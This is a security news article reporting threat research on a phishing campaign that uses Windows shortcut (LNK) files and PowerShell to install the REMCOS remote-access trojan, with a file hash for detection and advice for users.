New Attack Uses Windows Shortcut Files to Install REMCOS Backdoor

A new and deceptive multi-stage malware campaign has been identified by the Lat61 Threat Intelligence team at security firm Point Wild. The attack uses a clever technique involving malicious Windows Shortcut, or LNK, files, a simple pointer to a program or file, to deliver a dangerous remote-access trojan (RAT) known as REMCOS.

The research, led by Dr. Zulfikar Ramzan, the CTO of Point Wild, and shared with Hackread.com, reveals that the campaign starts with a seemingly harmless shortcut file, possibly attached to an email, with a filename like “ORDINE-DI-ACQUIST-7263535.”

When a user clicks on it, the LNK file discreetly runs a PowerShell command in the background. For your information, PowerShell is a powerful command-line tool Windows utilises for task automation; however, in this attack, it is used to download/decode a hidden payload.

This command is designed to download and decode a hidden payload without triggering security alerts, saving any files, or using macros. The research provides specific file hashes for this LNK file, including MD5: ae8066bd5a66ce22f6a91bd935d4eee6, to help in detection.

The LNK File Analysis (Source: Point Wild)

This campaign is designed to be stealthy by using a few different layers of disguise. After the initial PowerShell command runs, it fetches a Base64-encoded payload from a remote server. This is a common way to hide malicious code in plain sight, as Base64 is a standard method for encoding binary data into text.

Once the payload is downloaded and decoded, it is launched as a Program Information File or .PIF file, which is a type of executable often used for older programs. The attackers disguised this file as CHROME.PIF mimicking a legitimate program.

This final step installs the REMCOS backdoor, giving attackers full control of the compromised system. The malware also ensures its persistence on the system by creating a log file for its keystroke recording in a new Remcos folder under the %ProgramData% directory.

Once installed, the REMCOS backdoor grants the attackers extensive control over the victim’s computer. The threat intelligence report notes that it can perform a wide range of malicious activities, including keylogging to steal passwords, creating a remote shell for direct access, and gaining access to files.

Furthermore, the REMCOS backdoor allows the attackers to control the computer’s webcam and microphone, enabling them to spy on the user. The research also revealed that the command and control (C2) infrastructure for this specific campaign is hosted in Romania and the US.

This finding highlights the need for caution, as these attacks can originate from anywhere in the world. Researchers recommend that users stay cautious with shortcut files from untrusted sources, double-check attachments before opening them, and use updated antivirus software with real-time protection.